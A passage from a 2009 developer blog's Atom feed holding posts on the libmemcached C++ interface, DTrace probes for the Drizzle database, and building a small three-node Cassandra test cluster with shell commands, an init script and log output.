+------------------+-------------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

There will always just be one row in the output from this table. It essentially mimics the functionality of the memstat client utility in libmemcached.

I'm not too sure what what to do with this patch at the moment. If people are interested, I can propose it for merging into Drizzle so that it will be available as a plugin. 
</content>
 </entry>
 
 <entry>
   <title>Using Memcached with C++</title>
   <link href="http://posulliv.github.com/2009/09/19/using-memcached-with-c"/>
   <updated>2009-09-19T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/19/using-memcached-with-c</id>
   <content type="html">For some plugins I am working on for &lt;a href=&quot;http://www.drizzle.org/&quot;&gt;Drizzle&lt;/a&gt;, I am using the &lt;a href=&quot;https://launchpad.net/libmemcached&quot;&gt;libmemcached API&lt;/a&gt;. However, the C++ interface for libmemcached was quite simple and not really C++ so we have updated it a little bit in the last few months since drizzle is written in C++ and it would be nice to use a more C++-like interface in libmemcached. In this post, I'll show some simple sample usage of the libmemcached C++ interface based on &lt;a href=&quot;http://sacharya.com/using-memcached-with-java/&quot;&gt;this article&lt;/a&gt; about using memcached with Java. Please note that not all this functionality is in the latest stable version of libmemcached but it will likely be in the next release.

&lt;h3&gt;Installation&lt;/h3&gt;
I am going to assume that memcached is already installed (see &lt;a href=&quot;http://blog.ajohnstone.com/archives/installing-memcached/&quot;&gt;here&lt;/a&gt; for a good guide to installing it). To obtain libmemcached, we can either obtain the latest version of the source from launchpad, download an RPM, or download a tarball of the latest stable release and build that. I'm going to go with downloading a tarball since not everyone might have bzr installed. The latest stable release can be obtained from &lt;a href=&quot;http://tangent.org/552/libmemcached.html&quot;&gt;here&lt;/a&gt;.

&lt;pre&gt;
$ cd libmemcached-0.32
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig
&lt;/pre&gt;

&lt;h3&gt;Basic Usage&lt;/h3&gt;
The API is very similar to the C API except more suited to C++. Some simple examples of constructing a memcached client are shown:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189562.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

There are many more methods available than the 3 listed above but for most simple applications, those 3 should get you pretty far. We still need to add documentation for the C++ interface which should also be included in the next stable release of libmemcached.

&lt;h3&gt;MyCache Singleton&lt;/h3&gt;
As done in the Java article, I create a wrapper around the memcached client as so:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189520.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The DeletePtrs class is simply a generic function object that deletes the pointers in an STL container. I use this to delete all the Memcache objects in the vector before it is destroyed to ensure I don't have a memory leak (have a look at item 7 in Meyer's Effective STL for more information).

&lt;h3&gt;Sample Usage&lt;/h3&gt;
Below, we show some samples of using the MyCache singleton. We assume that Product is some class that has been developed elsewhere that we want to cache.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189545.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

That's about it really. As you can see, the C++ interface has been improved in libmemcached. There is still some more work needed on the C++ interface but I think its starting to look a lot better.
</content>
 </entry>
 
 <entry>
   <title>Using DTrace with Drizzle</title>
   <link href="http://posulliv.github.com/2009/09/14/using-dtrace-with-drizzle"/>
   <updated>2009-09-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/14/using-dtrace-with-drizzle</id>
   <content type="html">&lt;p&gt;Over the weekend, I was reading about the DTrace support in MySQL and realized that the DTrace support in drizzle needed to be updated. Thus, I created a branch and went to work on porting the latest probes from MySQL 6.0 to drizzle. I proposed a branch for merging into trunk which contains most of the relevant static probes along with some small build fixes to ensure that the probes are correctly enabled. Hopefully, this branch will get merged in the next week or two. In this post, I'm going to give some really simple examples of using the static probes in drizzle along with pointers to various places where lots more information can be obtained on using dtrace (mostly with MySQL but it all applies to drizzle too really).&lt;/p&gt;

&lt;h2&gt;Building Drizzle with DTrace Support&lt;/h2&gt;

&lt;p&gt;First of all, the drizzle binary built on a platform with dtrace is not configured with dtrace support by default. Thus, we need to configure drizzle by passing it the --enable-dtrace option. The rest of the build and installation process is the same as normal. Note that I have not tested dtrace support on OSX and I believe it probably does not work correctly at the moment. This is something I'll aim to fix (with help from Monty) in the next few weeks.&lt;/p&gt;
&lt;p&gt;To verify that the probes were built correctly, you should get similar output when listing the probes available in dtrace:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -l | grep drizzle | c++filt 
62444 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-done
62445 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-start
62446 drizzle11722          drizzled void Session::awake(Session::killed_state) connection-done
62447 drizzle11722          drizzled                 end_thread_signal connection-done
62448 drizzle11722          drizzled       void close_connections() connection-done
62449 drizzle11722          drizzled        bool Session::schedule() connection-start
62450 drizzle11722          drizzled bool mysql_delete(Session*,TableList*,Item*,st_sql_list*,unsigned long,unsigned long,bool) delete-done
62451 drizzle11722          drizzled bool drizzled::statement::Delete::execute() delete-start
62452 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-done
62453 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-start
62454 drizzle11722          drizzled bool mysql_insert(Session*,TableList*,List&amp;,List&lt;List &gt;&amp;,List&amp;,List&amp;,enum_duplicates,bool) insert-done
62455 drizzle11722          drizzled     void select_insert::abort() insert-select-done
62456 drizzle11722          drizzled  bool select_insert::send_eof() insert-select-done
62457 drizzle11722          drizzled bool drizzled::statement::InsertSelect::execute() insert-select-start
62458 drizzle11722          drizzled bool drizzled::statement::Insert::execute() insert-start
62459 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-done
62460 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-done
62461 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-start
62462 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-done
62463 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-start
62465 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-start
62466 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-done
62467 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-start
62468 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-done
62469 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-start
$
&lt;/pre&gt;

&lt;h2&gt;Example Usage&lt;/h2&gt;
&lt;p&gt;I'm just going to show some sample scripts that I obtained from various other sources (these sources are listed later) related to DTrace with MySQL. The first simple script we will try measures query execution time (this does not include time for parsing):&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   &quot;%Z%%M% %I%     %E% SMI&quot;

#pragma D option quiet
#pragma D option switchrate=10

dtrace:::BEGIN
{
        printf(&quot; %-16s %5s %3s %s\n&quot;, &quot;DATABASE&quot;, &quot;ms&quot;,
            &quot;RET&quot;, &quot;QUERY&quot;);
}

drizzle*:::query-exec-start
{
        self-&gt;start = timestamp;
        this-&gt;query = copyinstr(arg0);
        this-&gt;db = arg2 ? copyinstr(arg2) : &quot;.&quot;;
}

drizzle*:::query-exec-done
/self-&gt;start/
{
        this-&gt;elapsed = (timestamp - self-&gt;start) / 1000000;
        printf(&quot; %-16.16s %5d %3d %-32.32s\n&quot;,
            this-&gt;db, this-&gt;elapsed, (int)arg0, this-&gt;query);
        self-&gt;start = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that script on a toy instance of drizzle (unfortunately, I'm still a student so don't get to administer or play with any real databases) where I was running small queries is:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./qestat.d
 DATABASE            ms RET QUERY
                      0   0 select @@version_comment limit 1
                      0   0 show databases
                      0   0 SELECT DATABASE()
 test                 0   0 show databases
 test                 0   0 show tables
 test                 0   0 show tables
 test                 0   0 select * from t1
 test                 5   0 create table t1(a int)
 test                 0   0 insert into t1 values (5), (6),
 test                 0   0 select * from t1
 test                 0   0 select a from t1 where a = 7
^C
$
&lt;/pre&gt;

&lt;p&gt;Next, lets write a simple script that uses the filesort probe:&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   &quot;%Z%%M% %I%     %E% SMI&quot;

#pragma D option quiet
#pragma D option switchrate=10

drizzle$target:::query-start
{
  self-&gt;query = copyinstr (arg0);
  self-&gt;query_start = timestamp ;
}

drizzle$target:::filesort-start
{
  self-&gt;filesort_start = timestamp;
}

drizzle$target:::filesort-done
{
  self-&gt;filesort = timestamp - self-&gt;filesort_start;
}

drizzle$target:::query-done
/ self-&gt;query != 0 /
{
  printf(&quot;%s\n&quot;, self-&gt;query);
  printf(&quot;Total: %dus Filesort: %dus\n&quot;,
            (timestamp - self-&gt;query_start) / 1000,
            self-&gt;filesort / 1000);
  self-&gt;query = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that is (again, I have no data to play with here):&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./filesort.d
select @@version_comment limit 1
Total: 148us Filesort: 0us
show databases
Total: 595us Filesort: 0us
SELECT DATABASE()
Total: 114us Filesort: 0us
show databases
Total: 348us Filesort: 0us
show tables
Total: 274us Filesort: 0us
show fields in 't1'
Total: 112us Filesort: 0us
show tables
Total: 402us Filesort: 0us
select * from t1
Total: 292us Filesort: 0us
select * from t1 order by a
Total: 384us Filesort: 116us
^C
$
&lt;/pre&gt;

&lt;p&gt;There is lots more that can be done. Have a look at the resources below for many more examples that can be tried out on drizzle. I'm just beginning to play with DTrace in my spare time really so I'm not aware of all its capabilities and use cases. It would be cool to see something similar to the &lt;a href=&quot;http://opensolaris.org/os/community/dtrace/dtracetoolkit/&quot;&gt;DTrace Toolkit&lt;/a&gt; for drizzle though (like the Drizzle DTrace Toolkit...DDT).&lt;/p&gt;

&lt;h2&gt;More Information&lt;/h2&gt;
&lt;p&gt;A lot of articles and presentations have been produced on using DTrace with MySQL. Since the current probes in drizzle are just copied from MySQL, those are articles and presentations are still pretty useful to read if you want to play around with the dtrace probes in drizzle. Here are some good ones that I have come across:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://assets.en.oreilly.com/1/event/21/DTrace%20Support%20in%20MySQL_%20Guide%20to%20Solving%20Real-life%20Performance%20Problems%20Presentation.pdf&quot;&gt;DTrace Support in MySQL: Guide to Solving Real-life Performance Problems &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://assets.en.oreilly.com/1/event/21/Deep-inspecting%20MySQL%20with%20DTrace%20Presentation.pdf&quot;&gt;Deep-inspecting MySQL with DTrace&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://forge.mysql.com/w/images/e/ec/MySQLUDTrace0901.pdf&quot;&gt;Using DTrace with MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://dev.mysql.com/tech-resources/articles/getting_started_dtrace_saha.html&quot;&gt;Getting Started with DTracing MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.solarisinternals.com/wiki/index.php/DTrace_Topics_Databases&quot;&gt;DTrace Database Topics&lt;/a&gt; (from the Solaris Internals wiki)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Future Work&lt;/h2&gt;
&lt;p&gt;This is really just the beginning of adding dtrace support to drizzle. The largest issues right now are build related and ensuring that everything works correctly on both Solaris and OSX. The static probes that I defined were all copied from MySQL with some tiny modifications in places. I'd like to know what kind of probes other people would like to see? Does anyone have any suggestions or ideas? I'd really like to hear from people who actually administer databases on what they would like to see.&lt;/p&gt;

&lt;p&gt;From a drizzle developer's perspective, one thing I hope to see in the future is the ability for plugins to add static probes if they wish. I also need to add the probes in the handler. The only reason those are not present at the moment is due to some build related issues that I hope to resolve in the next few weeks.&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Building a Small Cassandra Cluster for Testing and Development</title>
   <link href="http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development"/>
   <updated>2009-09-07T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development</id>
   <content type="html">For college, I was playing with &lt;a href=&quot;http://incubator.apache.org/cassandra/&quot;&gt;cassandra&lt;/a&gt; and thought I would document my experience in setting up a small cassandra cluster for playing around with. For this article, I actually used virtual machines (3 of them). I am assuming that we have a fresh ubuntu installation on each node. I'm also assuming static IP addresses so the /etc/hosts file on each node will have the following entries (the actual IP addresses and host names can be whatever you like):

&lt;pre&gt;
192.168.221.138 cass01                  cass01
192.168.221.139 cass02                  cass02
192.168.221.140 cass03                  cass03
&lt;/pre&gt;

The process that I follow is to perform all the actions I outline below on one node and before actually starting the cassandra service, I clone the virtual machine as many times as I want. This makes it extremely quick for me to get up and running. I'm not going to go into detail on these issues here as there is plenty of information on these topics elsewhere (which go in to a lot more detail).

&lt;h2&gt;Required Packages&lt;/h2&gt;
Cassandra requires very little to run:
&lt;ul&gt;
	&lt;li&gt;Java 1.6&lt;/li&gt;
	&lt;li&gt;Ant&lt;/li&gt;
	&lt;li&gt;svn or git (only if you wish to obtain the latest code from trunk)&lt;/li&gt;
&lt;/ul&gt;
These packages can be installed easily:

&lt;pre&gt;
$ sudo apt-get install sun-java6-jdk ant git-core
&lt;/pre&gt;

&lt;h2&gt;Create &quot;cassandra&quot; User and Directories&lt;/h2&gt;
The following tasks will be performed on all nodes that we want to be in the cluster (what I do is to perform these actions on just 1 virtual machine and then clone the virtual machine multiple times). We are going to create a user account and group that cassandra will run as.

&lt;pre&gt;
$ sudo groupadd -g 501 cassandra
$ sudo useradd -m -u 501 -g cassandra -d /home/cassandra -s /bin/bash \
&gt; -c &quot;Cassandra Software Owner&quot; cassandra
$ id cassandra
uid=1001(cassandra) gid=501(cassandra) groups=501(cassandra)
$ sudo passwd cassandra
&lt;/pre&gt;

Next, we create directories for storing the software, data, commit logs, and configuration files.

&lt;pre&gt;
$ sudo mkdir -p /opt/cassandra
$ sudo mkdir -p /opt/cassandra/source
$ sudo mkdir -p /opt/cassandra/logs
$ sudo mkdir -p /opt/cassandra/callouts
$ sudo mkdir -p /opt/cassandra/bootstrap
$ sudo mkdir -p /opt/cassandra/staging
$ sudo mkdir -p /opt/cassandra/conf
$ sudo mkdir -p /u01/cassandra/data
$ sudo mkdir -p /u02/cassandra/commitlog
$ sudo chown -R cassandra:cassandra /opt/cassandra
$ sudo chown -R cassandra:cassandra /u01/cassandra
$ sudo chown -R cassandra:cassandra /u02/cassandra
$ sudo chmod -R 755 /var/cassandra
$ sudo chmod -R 755 /u01/cassandra
$ sudo chmod -R 755 /u02/cassandra
&lt;/pre&gt;

Above, we are making an assumption that /u01 and /u02 would be separate disks. Of course, I do not have separate disks but in reality, that the ideal scenario would be to store the commit logs and data on separate disks as alluded to above.  In order to make administration easier, we add the following the cassandra user's .bashrc file (or .bash_profile):

&lt;pre&gt;
export JAVA_HOME=/usr/lib/jvm/java-6-sun

export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_PATH=$CASSANDRA_HOME/bin

export PATH=$CASSANDRA_PATH:$PATH
&lt;/pre&gt;

Obviously, the various environment variables should be set to whatever is appropriate for your environment if you are deviating from what I am setting up here.

&lt;h2&gt;Download Cassandra&lt;/h2&gt;
download cassandra (we will use git in this article)  There are a number of options for downloading cassandra:
&lt;ul&gt;
	&lt;li&gt;&lt;a href=&quot;http://incubator.apache.org/cassandra/#download&quot;&gt;Stable Releases&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://hudson.zones.apache.org/hudson/job/Cassandra/lastSuccessfulBuild/artifact/cassandra/build/&quot;&gt;Nightly Development Snapshots&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Latest Code from trunk&lt;/li&gt;
&lt;/ul&gt;
Running the latest code in trunk is not recommended as it is not a stable release. However, I'm going to use the latest version of the repository (cloned from the git read-only repository) for this article as I'm interested in following the development of cassandra. Thus, I'll use git to retrieve the latest code:

&lt;pre&gt;
$ su - cassandra
$ cd /opt/cassandra/source
$ git clone git://git.apache.org/cassandra.git latest
&lt;/pre&gt;

&lt;h2&gt;Build and Configure Cassandra&lt;/h2&gt;
Now, we need to build the software:

&lt;pre&gt;
$ su - cassandra
$ cd $CASSANDRA_HOME
$ ant
Buildfile: build.xml

build-subprojects:

init:
    [mkdir] Created dir: /opt/cassandra/source/latest/build/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/build/test/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/src/gen-java

check-gen-cli-grammar:

gen-cli-grammar:
     [echo] Building Grammar /opt/cassandra/source/latest/src/java/org/apache/cassandra/cli/Cli.g  ....

build-project:
     [echo] apache-cassandra-incubating: /opt/cassandra/source/latest/build.xml
    [javac] Compiling 254 source files to /opt/cassandra/source/latest/build/classes
    [javac] Note: Some input files use or override a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

build:

BUILD SUCCESSFUL
Total time: 10 seconds
$
&lt;/pre&gt;

We would like to be able to keep configuration files out of the main source tree so we copy the sample configuration files provided with the source to a particular configuration directory we maintain for cassandra:

&lt;pre&gt;
$ cp -R $CASSANDRA_HOME/conf/* $CASSANDRA_CONF
$ cp $CASSANDRA_HOME/bin/cassandra.in.sh $CASSANDRA_INCLUDE
$ cd $CASSANDRA_CONF
$ ls -l
total 24
-rw-r--r-- 1 cassandra cassandra  1886 2009-09-05 16:05 cassandra.in.sh
-rw-r--r-- 1 cassandra cassandra  1664 2009-09-05 14:51 log4j.properties
-rw-r--r-- 1 cassandra cassandra 13926 2009-09-05 14:51 storage-conf.xml
$
&lt;/pre&gt;

The cassandra.in.sh file can be used to specify JVM options (such as the maximum heap size). Within the cassandra.in.sh file we copied over, various options can be set but we need to remove the following lines (as we have already defined CASSANDRA_CONF):

&lt;pre&gt;
# The directory where Cassandra's configs live (required)
CASSANDRA_CONF=$cassandra_home/conf
&lt;/pre&gt;

The first configuration file which we modify is the storage-conf.xml file. The main portions which we modify are:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/288454.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The storage-conf.xml configuration file is well commented and provides ample explanation on the various parameters that can be configured. It is worth reading through that file when you are wondering what can be tweaked in cassandra.  Next, we need to configure the logging properties for the system. These properties are specified in the log4j.properties file (again in the $CASSANDRA_CONF directory). The portion to modify is:

&lt;pre&gt;
# Edit the next line to point to your logs directory
log4j.appender.R.File=/opt/cassandra/logs/system.log
&lt;/pre&gt;

&lt;h2&gt;Starting/Stopping Cassandra&lt;/h2&gt;
First, lets start cassandra on one node in the foreground to ensure that everything is set up correctly. Open 2 terminal windows and in one of them, start cassandra in the foreground:

&lt;pre&gt;
$ su - cassandra
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 66210133872783152550171468874444798372
DEBUG - Starting to listen on 127.0.1.1:7001
DEBUG - Binding thrift service to cass01:9160
INFO - Cassandra starting up...
&lt;/pre&gt;

Now, in the other terminal window, use the cassandra command-line interface to connect to the instace we started in our other window:

&lt;pre&gt;
$ su - cassandra
$ cassandra-cli --host cass01 --port 9160
Connected to cass01/9160
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
cassandra&gt; help
List of all CLI commands:
?                                                      Same as help.
connect \&lt;hostname&gt;/&lt;port&gt;                              Connect to Cassandra's thrift service.
describe keyspace &lt;keyspacename&gt;                       Describe keyspace.
exit                                                   Exit CLI.
help                                                   Display this help.
quit                                                   Exit CLI.
show config file                                       Display contents of config file
show cluster name                                      Display cluster name.
show keyspaces                                         Show list of keyspaces.
show version                                           Show server version.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']                             Get a slice of columns.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;']                 Get a column value.
set &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;'] = '&lt;value&gt;'     Set a column.
cassandra&gt; show version
0.4.0
cassandra&gt; exit
$
&lt;/pre&gt;

The cassandra script provided in the bin directory can be used to start cassandra but I wanted a script that I could use to easily start/stop a cassandra instance. Here is an extremely simple script we can use to start and stop cassandra that I created:

&lt;pre&gt;
#!/bin/bash
#
# /etc/init.d/cassandra
#
# Startup script for Cassandra
#

export JAVA_HOME=/usr/lib/jvm/java-6-sun
export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_OWNR=cassandra
export PATH=$PATH:$CASSANDRA_HOME/bin
log_file=/opt/cassandra/logs/stdout
pid_file=/opt/cassandra/logs/pid_file

if [ ! -f $CASSANDRA_HOME/bin/cassandra -o ! -d $CASSANDRA_HOME ]
then
    echo &quot;Cassandra startup: cannot start&quot;
    exit 1
fi

case &quot;$1&quot; in
    start)
        # Cassandra startup
        echo -n &quot;Starting Cassandra: &quot;
        su $CASSANDRA_OWNR -c &quot;$CASSANDRA_HOME/bin/cassandra -p $pid_file&quot; &gt; $log_file 2&gt;&amp;1
        echo &quot;OK&quot;
        ;;
    stop)
        # Cassandra shutdown
        echo -n &quot;Shutdown Cassandra: &quot;
        su $CASSANDRA_OWN -c &quot;kill `cat $pid_file`&quot;
        echo &quot;OK&quot;
        ;;
    reload|restart)
        $0 stop
        $0 start
        ;;
    status)
        ;;
    *)
        echo &quot;Usage: `basename $0` start|stop|restart|reload&quot;
        exit 1
esac

exit 0
&lt;/pre&gt;

The above script can be used to ensure that a cassandra service starts and stops automatically on startup/shutdown of our nodes. This might not be what you want but if it is, you would ensure the script is run at startup/shutdown by copying the script to /etc/init.d and doing the following:

&lt;pre&gt;
$ sudo chmod a+x /etc/init.d/cassandra
$ cd /etc/init.d
$ sudo update-rc.d cassandra defaults 99
update-rc.d: warning: /etc/init.d/cassandra missing LSB information
update-rc.d: see &lt;http://wiki.debian.org/LSBInitScripts&gt;
 Adding system startup for /etc/init.d/cassandra ...
   /etc/rc0.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc1.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc6.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc2.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc3.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc4.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc5.d/S99cassandra -&gt; ../init.d/cassandra
$
&lt;/pre&gt;

&lt;h2&gt;Adding New Nodes&lt;/h2&gt;

Now that we have 1 node up and running, its time to add more nodes to our cassandra cluster. This is an extremely simple process once the initial node has been set up. Assumming we have performed all the steps listed above on another node (or simply cloned a virtual machine with these steps performed as I am doing), all we need to do is modify the cassandra configuration files on the new nodes. I wish to add 2 new nodes so I will modify the appropriate portion of the storage-conf.xml configuration file to indicate this:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288458.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;


Now, lets start the cass02 node in the foreground to see what happens. We would expect to see some indication in the output that knowledge is gained of the other node (in this case cass01) that is available:

&lt;pre&gt;
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 107959976695419204492109802329269912484
DEBUG - Starting to listen on 192.168.221.139:7001
DEBUG - Binding thrift service to cass02:9160
INFO - Cassandra starting up...
INFO - Node 192.168.221.138:7001 has now joined.
DEBUG - CHANGE IN STATE FOR 192.168.221.138:7001 - has token 65882889577194449649405650603559126735
&lt;/pre&gt;

Ok, now lets start the cassandra service up on cass02 properly using the script I showed earlier. Lets monitor the system log on the initial node we set up (cass01) to see what happens:

&lt;pre&gt; 
INFO [main] 2009-09-07 02:16:14,851 CassandraDaemon.java (line 142) Cassandra starting up...
INFO [GMFD:1] 2009-09-07 02:17:36,433 Gossiper.java (line 630) Node 192.168.221.139:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:17:36,435 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.139:7001 - has token 107959976695419204492109802329269912484
&lt;/pre&gt;

Next, lets start the cassandra service on another node (cass03) and see what happens in the system logs of the initial node (cass01). Note that the storage-conf.xml file on this new node will require the same modifications as mentioned for the cass02 node (the Seeds directive).

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:18:44,827 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:18:44,828 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
&lt;/pre&gt;

Next, we will shutdown the cass03 node and monitor the system logs where we will observe the following:

&lt;pre&gt; 
INFO [Timer-1] 2009-09-07 02:19:05,960 Gossiper.java (line 234) EndPoint 192.168.221.140:7001 is now dead.
&lt;/pre&gt;

Now, lets start cass03 back up again to see what happens:

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:20:30,737 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 465)
Sending hinted data to 192.168.221.140:7000
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,743
HintedHandOffManager.java (line 200) Started hinted handoff for endPoint 192.168.221.140
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,760
HintedHandOffManager.java (line 235) Finished hinted handoff for endpoint 192.168.221.140
&lt;/pre&gt;

Now all 3 nodes are back in the cluster again. We can see how easy it is to add new nodes. We simply need to inform the new node of some other nodes in the cluster (not necessarily all of them due to the gossip-based membership protocol).

&lt;h2&gt;Conclusion&lt;/h2&gt;
The main reason I wrote this post is because I wanted to document my experiences in setting up a small cassandra cluster for future reference. I'm taking a &lt;a href=&quot;http://lagoon.cs.umd.edu/classes/818fall09/&quot;&gt;class&lt;/a&gt; this semester in distributed systems for fun (since I've satisfied the course requirements for my program) which involves a semester project and one project that I've been toying with in my mind is performing an experimental evaluation of various failure detectors. For example, cassandra uses the phi-accrual failure detector from H&lt;span&gt;&lt;span class=&quot;a&quot;&gt;ayashibara&lt;/span&gt;&lt;/span&gt;et al's &lt;a href=&quot;http://ddg.jaist.ac.jp/pub/HDY+04.pdf&quot;&gt;paper&lt;/a&gt; but there is a multitude of other possible failure detectors that could be used. I'm thinking of implementing and evaluating various failure detectors in real systems such as cassandra and &lt;a href=&quot;http://project-voldemort.com/&quot;&gt;voldemort&lt;/a&gt;. It is one possibility for a project that I've thought of (which I have not ran by the professor yet). I've implemented a different failure detector in cassandra already this week but performing an evaluation of a failure detector is not an easy process (what metrics to use to evaluate a failure detector is itself an interesting question). However, if anyone could think of any other interesting project in distributed systems that might allow me to make a contribution to one of these open-source projects, that would be awesome! Anyway, that's all I've got for now. A really good article to read next is &lt;a href=&quot;http://blog.evanweaver.com/articles/2009/07/06/up-and-running-with-cassandra/&quot;&gt;this one&lt;/a&gt; that goes into some detail on actually using cassandra.
</content>
 </entry>
 
 <entry>
   <title>Developing a Replicator Plugin for Drizzle</title>
   <link href="http://posulliv.github.com/2009/07/24/developing-a-replicator-plugin-for-drizzle"/>
   <updated>2009-07-24T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/07/24/developing-a-replicator-plugin-for-drizzle</id>
